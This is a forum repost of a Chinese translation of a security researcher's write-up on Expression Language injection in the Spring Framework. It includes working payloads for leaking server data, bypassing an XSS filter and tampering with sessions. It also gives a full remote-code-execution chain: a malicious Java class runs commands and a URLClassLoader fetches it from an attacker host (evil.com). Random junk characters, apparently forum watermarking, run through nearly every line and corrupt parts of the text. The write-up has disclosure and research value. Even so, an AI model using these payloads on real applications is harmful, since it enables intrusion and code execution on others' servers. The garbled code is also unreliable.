Remote Code with6 w, F- ?* m; W3 x! u
Expression Language Injection
1 t$ Y b+ [4 S8 q" j" u2 sSpring Framework脆弱性—DanAmodio6 f8 N; U! z- C0 X4 i/ F3 [' r( J
全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中
2 W/ h B* E# [8 ^& G3 Q可能会存在风险。# l# K/ U$ s8 k/ f! f v/ ]% ^, [& ~ P
在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的
' n+ Z, ?' g0 p2 G/ ^+ g3 S x# vArshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可8 M9 \. a5 |- J, Q; l7 z
以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,
6 [& q0 ], ~& x4 g. M以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前! D) Y+ O+ ~" e6 B
版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。" P- T h7 J# b8 w( c- O0 \
由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但
$ [0 b7 o& R+ A0 i2 r我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版& r" L; ~7 Z1 o8 h
本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。
2 ^( Y# l- B6 h3 G4 S( h这些版本不支持禁用double EL resolution.% X! P3 Y2 Z4 F+ P& e0 ^0 S
这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含
0 j0 N3 a3 A; _ T! fEL2.2容器上可能进行远程代码执行。" q/ x3 z) e& d2 G7 D* X
这是一个原始信息泄露的攻击例子:
3 ?6 h7 x! \. a3 e* v# i请求:
" I* ~5 t& Y' C# k+ ~ttp://vulnerable.com/foo?message=${applicationScope}/ f7 f2 f; w, a9 Y1 L
到达以下内容页面:
! D% i* q7 P9 p+ O4 i结果将输出一些包含内部服务器信息calsspath 和本地工作目录$ ^7 V, I9 ]7 i5 p3 I' z: z+ X
你也可以做一些其他事情,如这样:
3 l9 ]! M( d& E q" m b& w% d; j$ _${9999+1}) Q$ X( \ t3 @- Q) C
还可以访问session 对象和beans. h6 v' v4 s3 L+ I( ?( n
${employee.lastName}1 E! s9 `) Z2 v7 U6 S8 ~
在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是
% \3 F( t4 J" k0 H" U2 Q9 sEL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东1 r3 m: M W. ^( w4 r
西,比如XSS.
$ \ }9 e' N. z6 f哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签' w u) G- {7 \2 Q
突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤
/ b7 r& l$ Y2 R& m0 z% q' j呢?”
- m5 z" A: g( q8 D0 t- r2 x因此,我尝试巳缦拢�+ o/ U. [. g0 t: a/ \
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP- ~$ c# L0 S3 w* }: [* O. @. y
P) _* z, s* K" P' Y4 T
我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返: c t4 o+ s3 u. o% A1 d
回的文本被插入进了spring:message 标签。2 N9 i3 k$ C' I) z: C0 e
这里是一个最终绕过过滤的实例:9 A/ A, D, Y5 ^3 S" \" j7 a7 A. ^0 m
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1) /scriptQ
& m8 _+ C1 G1 k. l; z3 ^# g它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为* Z2 w9 o6 j; \2 | }) n" w/ i2 D
什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?8 F8 w8 k0 W6 N5 J. K0 O0 i1 Y
经过一番研究,我学习到EL2.2 增加了方法调用。7 H8 n; Y- a' C, E
我写了一个快速测试应用程序代码并且检测一些功能6 ^; |+ ~& S$ I! b" k# n
${pageContext.request.getSession().setAttribute(“account”,”123456″)}
R$ w! ?' i# b& b# [0 a9 h${pageContext.request.getSession().setAttribute(“admin”,true)}
4 `8 [% J; L' N$ y) Y! |好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的; ~2 }7 O: z) g) v. H( t
指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?. e: Z. \" O, M m$ h' m( l7 n5 Y
${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.1
5 z, |; n4 [' ]/ m% S& J& e! F1 i“, 1234)}: Y& o2 X9 r* U: y. H3 d7 f
${“”.getClass().forName(“java.lang.Runtime”)}3 v+ A3 j7 {" i" n4 C6 J. E9 f
哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不
, P0 U' f3 z* g+ O1 a9 _, h可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函* V" N, T' T* J9 r7 I
数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有' O; R# L ]+ l' t, a/ }2 U
一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于
/ f9 ^2 t3 T: B" E1 R) Z7 J方法签名invoke(Object obj, Object„ args)# i% s k0 \: ]0 `0 f
Jeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问
% S" G* s! _( ~# i1 J2 J题,以让它可以工作起来。
4 ~/ L0 }( A$ S6 b/ N6 {% J P漏洞利用:
$ C6 }. x+ X. p: k1 [& F我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我) x- N" C: t+ U' W, O# h ^/ {/ s' B
希望你们中的一些JAVA奇才告诉我我是如此的可笑。- t' u9 y# |. ~
这里有一些我试过的失败的用例,为了试图让它工作的用例:/ j* t2 a- w6 N3 ^
写文件到文件系统9 B; k6 M9 `8 q7 }
试图载入org.springframework.expression.spel.standard.SpelExpressionParser.; X& ~( b" ?! \1 s
我认为这些可以很好的工作,但是我不能找到合适的类来载入。
3 Y' r5 O& P' h0 ?' n${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}
$ L; Z, |( ?& ]/ d4 R; M yjavax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:5 c y/ d. p9 y0 U- n3 R) O
org.springframework.expression.spel.standard.SpelExpressionParser not found
6 L: q2 n( w+ g( A' F) t2 A7 lby" ` b7 m4 C2 ]. u, L( ^. q
org.glassfish.web.javax.servlet.jsp [194].( ]% ]! z7 z" N, ^& x8 b# F
利用反射来修改java.lang.Runtime.currentRuntime的属性为Public
! J8 o0 @: {6 l! @ 利用反射来创建一个新的Runtime(and watch the world burn)& c1 h/ b! H9 q% A1 U
${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName
+ L$ O$ c C6 k m0 S(“java.lang.Runtime”)).getDeclaredConstructors()[0])}- K1 O. l* j1 m% O
${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}
. l1 q+ X5 K$ G" Y. ] 使用java.lang.ProcessBuilder
* n5 P$ M5 f6 t) ~) ]0 G" V, k5 M 用表达式语言来评估表达式语言
i7 {9 {* W6 bExpression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.$ Q* D: m, |& `+ ]3 U5 j
${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request
: p5 L# o* U0 ?! i9 R“,”".getClass(),null)}
/ |; V4 D& i C; _ 创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)
/ u2 s" M$ U: _9 w我在使用一个空数组通过Method.invoke()时失败了很多次
( z! p, E+ N6 M4 h& R“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo
. g1 r3 T+ d4 b, s8 a.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A% `' V4 I9 ]8 E
rrayList”).newInstance().toArray())
% ^) ]( u( b8 Y! @ d* M' ]java.lang.IllegalArgumentException: wrong number of arguments; \9 {$ S: z( I: l. U
最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可
6 G2 z; y( R* Z# G U; s& a' r以创建一个恶意class文件并且指向类装载器.
7 J4 s. d0 N' f( A. G我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:
Q( ` M. M' {! A) Xpublic class Malicious {
5 E. a! }& @# z% a I, Ypublic Malicious() {
+ }4 a7 R, \6 E; ?try {
; O8 @0 z" T: L% L! X- ^; v' djava.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac
2 V& H7 z% P* }1 N b0 W2 N- ijava.lang.Runtime.getRuntime().exec(“calc.exe”); //Win
- M `8 Q* N- D! [} catch (Exception e) {
5 o! T6 I8 }) u ?' u. T' {4 X}
5 E7 ?2 V7 V6 `: w5 A# v/ ~4 O}1 P+ `) I9 f" p
我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回. m# n# [: w" v
话中,因此它可以被使用.
1 i$ L3 f" p7 f0 l* z${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName# H! J+ l+ s2 q
(“java.util.ArrayList”).newInstance())}9 E" }+ g; L1 [. i
URLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建1 R6 z. k# B7 x& s# _
一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和
7 A/ j$ W" E$ R1 d0 ?3 s RgetResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个 x, b% m& }1 L0 [6 [
我们可以调用的create(string)方法,然后转换对一个URL对象。! {3 j& y+ i3 t2 l0 M% e# Z
${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh3 J! K* a0 {+ Y9 @" t i
ere/malicious/classfile/is/located/”).toURL())}
& J% Q5 s- {5 P5 H" \" T然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,
7 d$ d" V6 \' c! P+ a: Z1 l恶意类文件被装载并创建,触发远程代码.) ?, c3 }5 Z, U' C( n! B# B
${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte
5 _: t2 P) c& t* y1 zxt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().
M7 _5 K" t7 p7 z, pgetClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance
8 v: |. A% g& M2 E2 l5 p7 M. d()} |
发表于 2013-2-16 21:47:24
收藏
支持
反对